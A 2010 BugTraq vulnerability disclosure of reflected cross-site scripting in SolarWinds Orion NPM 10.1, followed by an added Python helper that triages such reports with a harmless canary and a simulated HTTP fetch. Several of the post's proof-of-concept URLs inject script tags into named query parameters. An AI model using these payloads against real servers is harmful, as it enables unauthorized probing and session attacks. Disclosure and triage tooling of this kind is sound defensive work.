BugTraq
Multiple XSS in Solarwinds Orion NPM 10.1
Dec 07 2010 05:16PM
John Blakley (john blakley gmail com)
Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.
Examples:
Most "variable=" that I've checked are vulnerable:
http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-2312700225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&I:100&view=InterfaceDetails
http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
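Added example, not part of the post above and not SolarWinds code: an offline triage helper for reflected-XSS reports of this shape. It pulls the injected parameter out of each PoC URL, swaps the alert() payload for a unique canary containing every character an HTML-body context must encode, and classifies how a page body reflects that canary (raw, entity-encoded, or absent). The hostname orion.example, the fake_fetch stand-in for an HTTP client, and the simulated "fixed" NodeDetails response are assumptions for the sake of a runnable demo; the post reports NodeDetails as vulnerable, and the stand-in only exists so both verdicts appear.

```python
import html
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Two of the post's PoC URLs joined back onto one line each. The host is an
# assumption (the post only says <server>); constructed sample input.
POC_URLS = [
    "http://orion.example/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-2312700225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E",
    "http://orion.example/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E",
]

# Unique token wrapped around the characters that must come back encoded in
# HTML-body context. Unlike <script>alert(), a canary also reveals the case
# where the page encodes output, i.e. where the report would be a false positive.
CANARY = "xq9<>\"'xq9"


def injected_params(url: str) -> Dict[str, str]:
    """Return {param: decoded value} for every query parameter carrying markup."""
    query = urlsplit(url).query
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True)
            if "<" in v or ">" in v}


def probe_url(url: str, param: str, canary: str = CANARY) -> str:
    """Rebuild url with `param` set to the canary; other parameters untouched."""
    parts = urlsplit(url)
    pairs = [(k, canary if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def classify_reflection(body: str, canary: str = CANARY) -> str:
    """'raw' when the canary appears verbatim (markup reaches the HTML parser
    unchanged), 'encoded' when it only appears after entity-decoding, 'absent'
    otherwise. Caveat: a reflection inside a JavaScript string with backslash
    escaping reads as 'absent' here; that context needs its own check."""
    if canary in body:
        return "raw"
    if canary in html.unescape(body):
        return "encoded"
    return "absent"


def fake_fetch(url: str) -> str:
    """Constructed stand-in for an HTTP client (assumption, not Orion's real
    output). MapView echoes Title unencoded, as the post describes; NodeDetails
    is simulated as a fixed page that HTML-encodes NetObject, so the demo shows
    both verdicts. Swap in a real client to test a live instance."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if parts.path.endswith("MapView.aspx"):
        title = params.get("Title", "")
        return f"<html><head><title>{title}</title></head><body>map</body></html>"
    if parts.path.endswith("NodeDetails.aspx"):
        node = html.escape(params.get("NetObject", ""), quote=True)
        return f"<html><body><h1>Node {node}</h1></body></html>"
    return "<html><body>not found</body></html>"


def triage(urls: List[str], fetch: Callable[[str], str]) -> List[Tuple[str, str, str]]:
    """For each injected parameter in each PoC URL: (page, param, verdict)."""
    results = []
    for url in urls:
        page = urlsplit(url).path.rsplit("/", 1)[-1]
        for param in injected_params(url):
            body = fetch(probe_url(url, param))
            results.append((page, param, classify_reflection(body)))
    return results


if __name__ == "__main__":
    for page, param, verdict in triage(POC_URLS, fake_fetch):
        print(f"{page:20} {param:10} {verdict}")
```

The canary is deliberately not a working payload: the question a triage pass has to answer is whether the parameter reaches the HTML parser unencoded, and that is visible from the entity form of the reflection without executing anything in a browser.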
Copyright 2010, SecurityFocus